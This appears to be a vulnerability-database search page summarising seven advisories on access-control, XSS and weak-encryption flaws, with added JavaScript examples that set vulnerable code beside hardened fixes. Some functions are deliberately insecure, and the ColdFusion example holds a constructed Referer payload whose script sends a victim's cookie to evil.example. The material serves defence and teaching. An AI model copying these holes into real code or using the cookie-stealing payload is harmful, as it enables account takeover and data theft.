7 matches found

NVD
added last week

CVE-2026-27708

FOSSBilling is a free, open-source billing and client management system. In versions 0.7.2 and prior, the Servicecustom Client API's call method accepts an orderid parameter and fetches the associated order without verifying the authenticated client owns it, potentially exposing cross-client data...

CVSS 7.1 | EPSS 0.00265 | Exploits 0 | References 2
Positive Technologies
added 2026/06/23

PT-2026-51591

Name of the Vulnerable Software and Affected Versions: FOSSBilling versions prior to 0.8.0. Description: A query-construction flaw in client list endpoints allows authenticated clients to bypass tenant scoping and retrieve data from other clients. The issue occurs in the getSearchQuery functions of...

CVSS 7.1 | AI score 5.8 | EPSS 0.00282 | Exploits 0 | References 8
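Both FOSSBilling entries above (CVE-2026-27708 and PT-2026-51591) describe the same class of defect: a per-client lookup or list query that is not bound to the authenticated client. The JavaScript below is an added illustration, not FOSSBilling code. The in-memory order table, the client ids, the function names and the particular way the vulnerable query builder loses its tenant predicate are constructed assumptions (the page does not say how getSearchQuery is flawed); they show one common way such a bypass arises and the fix that works for both the single-object and the list case.

```javascript
// Added example (not FOSSBilling's code): tenant scoping for a per-client API.
// The order table, client ids and function names below are constructed.
const ORDERS = [
  { id: 101, client_id: 1, title: 'Hosting plan A' },
  { id: 102, client_id: 2, title: 'Domain renewal' },
  { id: 103, client_id: 1, title: 'SSL certificate' },
];

// Vulnerable lookup: the order id alone selects the row, so any authenticated
// client who supplies another client's order id receives that order.
function getOrderUnscoped(orderId) {
  return ORDERS.find(o => o.id === orderId) || null;
}

// Hardened lookup: the caller's client id is part of the lookup key, so a
// foreign order id simply does not resolve (null, not a 403 that would
// confirm the id exists).
function getOrderForClient(clientId, orderId) {
  return ORDERS.find(o => o.id === orderId && o.client_id === clientId) || null;
}

// Search-query builder, vulnerable variant (an assumed pattern, not necessarily
// the one in FOSSBilling): the tenant predicate is only added when no other
// filter is present, so any user-supplied filter silently drops the scoping.
function buildSearchQueryVulnerable(clientId, filters) {
  const where = [];
  const params = [];
  if (filters.title) {
    where.push('title LIKE ?');
    params.push(`%${filters.title}%`);
  }
  if (where.length === 0) {
    where.push('client_id = ?');
    params.push(clientId);
  }
  return { sql: `SELECT * FROM client_order WHERE ${where.join(' AND ')}`, params };
}

// Hardened builder: the tenant predicate is unconditional and comes from the
// session, never from request input; user filters can only narrow the set.
function buildSearchQueryScoped(clientId, filters) {
  const where = ['client_id = ?'];
  const params = [clientId];
  if (filters.title) {
    where.push('title LIKE ?');
    params.push(`%${filters.title}%`);
  }
  return { sql: `SELECT * FROM client_order WHERE ${where.join(' AND ')}`, params };
}

// Minimal in-memory executor for the two builders so the difference is
// observable offline; it understands only the two predicates used above.
function runQuery(query) {
  let rows = ORDERS;
  const conds = query.sql.split(' WHERE ')[1].split(' AND ');
  conds.forEach((cond, i) => {
    const val = query.params[i];
    if (cond === 'client_id = ?') {
      rows = rows.filter(o => o.client_id === val);
    } else if (cond === 'title LIKE ?') {
      const needle = val.slice(1, -1).toLowerCase();
      rows = rows.filter(o => o.title.toLowerCase().includes(needle));
    }
  });
  return rows.map(o => o.id);
}

// Client 1 searching for "domain": the vulnerable builder returns client 2's
// order 102, the scoped builder returns nothing.
function demo() {
  return {
    leaked: runQuery(buildSearchQueryVulnerable(1, { title: 'domain' })),
    scoped: runQuery(buildSearchQueryScoped(1, { title: 'domain' })),
  };
}
```

The check to carry over to a real code base is the same in both halves: every read path that serves a client takes the client id from the session and puts it in the query before any request-controlled input is considered.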
Cvelist
added 2026/06/05 6:44 p.m.

CVE-2026-46396 HAX CMS has a stored XSS via <iframe> that allows access to sensitive client-side data and account takeover

HAX CMS helps manage a microsite universe with PHP or NodeJs backends. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 26.0.0 due to improper sanitization of elements. The application allows javascript: URIs in the src attribute, which are executed when a malicious page ...

CVSS 9.3 | EPSS 0.0023 | Exploits 0 | References 1
Positive Technologies
added 2026/01/24

PT-2026-4544

ChatterMate is a no-code AI chatbot agent framework. In versions 1.0.8 and below, the chatbot accepts and executes malicious HTML/JavaScript payloads supplied as chat input. Specifically, a payload containing a javascript: URI can be processed and executed in the browser context. This allow...

CVSS 9.3 | AI score 5.4 | EPSS 0.00302 | Exploits 1 | References 4
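The HAX CMS entry (CVE-2026-46396) and the ChatterMate entry (PT-2026-4544) share one root cause: a javascript: URI accepted in a URL-bearing attribute such as an iframe's src. The JavaScript below is an added illustration of the check a sanitiser needs, not code from either project. The helper names, the attribute and scheme lists and the sample payloads are constructed; it goes slightly beyond the two advisories by also covering entity-encoded and whitespace-obfuscated schemes, which a naive `startsWith('javascript:')` test misses.

```javascript
// Added example (not HAX CMS or ChatterMate code): rejecting javascript: and
// other executable URI schemes in URL-bearing attributes before markup from an
// untrusted author reaches the DOM. Helper names and payloads are constructed.
const URL_ATTRS = new Set(['src', 'href', 'xlink:href', 'action', 'formaction']);
// Allow-list of schemes; everything else (javascript:, data:, vbscript:, ...) is refused.
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

// Code points above U+10FFFF would make String.fromCodePoint throw; map them
// to U+FFFD so a malformed entity cannot crash the sanitiser.
const fromCodePoint = n => (n <= 0x10ffff ? String.fromCodePoint(n) : '\uFFFD');

// Decode numeric and the common named entities. A sanitiser that sees raw
// markup must do this, because the browser decodes "&#106;avascript:" to
// "javascript:" before it parses the URL.
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => fromCodePoint(parseInt(d, 10)))
    .replace(/&(amp|lt|gt|quot|apos);/g,
      (_, n) => ({ amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" })[n]);
}

// Extract the scheme the browser would see. Browsers drop leading/trailing C0
// controls and space, and all tabs and newlines, before parsing, so
// "java\tscript:" or " javascript:" still execute; strip all of them here
// (slightly stricter than the URL parser, which is the safe direction).
function urlScheme(value) {
  const cleaned = decodeEntities(String(value)).replace(/[\u0000-\u0020\u007f]/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  return m ? m[1].toLowerCase() : null;
}

// Relative URLs (no scheme) are fine; absolute URLs must use an allowed scheme.
function isSafeUrl(value) {
  const scheme = urlScheme(value);
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// Filter one element's attribute map: drop inline event handlers, iframe
// srcdoc (an inline document that bypasses any src check), and any URL
// attribute whose scheme is not allowed.
function sanitizeAttributes(attrs) {
  const out = {};
  for (const [rawName, value] of Object.entries(attrs)) {
    const name = rawName.toLowerCase();
    if (name.startsWith('on')) continue;
    if (name === 'srcdoc') continue;
    if (URL_ATTRS.has(name) && !isSafeUrl(value)) continue;
    out[name] = value;
  }
  return out;
}
```

When the sanitiser runs over an already-parsed DOM, the entity decoding is redundant (the parser has done it), but it is harmless; when it runs over a serialised string, it is essential. Either way the decision must be an allow-list of schemes, not a deny-list of known-bad prefixes.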
RedhatCVE
added 2025/05/22 6:25 p.m.

CVE-2021-25002

The Tipsacarrier WordPress plugin before 1.5.0.5 does not have any authorisation check in place for some functions, which could allow unauthenticated users to access Orders data, which could in turn be used to retrieve the client's full address, name and phone via a tracking URL...

CVSS 7.5 | AI score 6.8 | EPSS 0.0147 | Exploits 2 | References 1
Cvelist
added 2025/02/26

CVE-2024-50684

SunGrow iSolarCloud Android app V2.1.6.20241017 and prior uses an insecure AES key with insufficient entropy to encrypt client data. This may allow attackers to decrypt intercepted communications between the mobile app and iSolarCloud...

EPSS 0.00325 | Exploits 0 | References 1
securityvulns
added 2003/09/23

ColdFusion cross-site scripting security vulnerability of an error page

Outline of the vulnerability: Macromedia's ColdFusion can display various information about an error at the time the error occurred. This includes information transmitted from the client machine, such as the "Referer" header. ColdFusion displays that information as is, without encoding it. An attacker can execute a script on a victim's...

AI score 6.8 | Exploits 0
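The ColdFusion entry describes a reflected XSS through a request header: the error page writes the Referer value into HTML as is. The JavaScript below is an added illustration of that defect beside its fix, not ColdFusion code; the page template, the escapeHtml helper, the containsScriptTag check and the sample request are constructed. The Referer is attacker-controlled because the attacker hosts the page whose link sends the victim to the error-triggering URL.

```javascript
// Added example (not ColdFusion code): rendering a request header on an error
// page with and without output encoding. Template and request are constructed.

// Encode for the HTML text and double-quoted attribute contexts. A single
// regex pass means '&' is never re-encoded by a later replacement.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Vulnerable: the header value is concatenated into the page as raw markup,
// so any tag inside it becomes part of the document.
function renderErrorPageVulnerable(message, headers) {
  return `<h1>Error</h1><p>${message}</p><p>Referer: ${headers.referer || ''}</p>`;
}

// Hardened: every value that did not originate in the template is encoded
// for the context it lands in (HTML text here).
function renderErrorPageSafe(message, headers) {
  return `<h1>Error</h1><p>${escapeHtml(message)}</p>` +
    `<p>Referer: ${escapeHtml(headers.referer || '')}</p>`;
}

// Crude detector used only by this example: is there a script tag in the
// output? The template itself contains none, so any hit came from input.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed request: the Referer carries a payload that exfiltrates the
// victim's cookie to the attacker's host.
const MALICIOUS_REQUEST = {
  referer: 'http://evil.example/?r=<script>' +
    'document.location="http://evil.example/?c="+document.cookie</script>',
};

function demo() {
  return {
    vulnerable: renderErrorPageVulnerable('Page not found', MALICIOUS_REQUEST),
    safe: renderErrorPageSafe('Page not found', MALICIOUS_REQUEST),
  };
}
```

The encoding function is context-specific: the one above is correct for HTML text and quoted attributes, and would be the wrong choice for a value written into a script block or a URL.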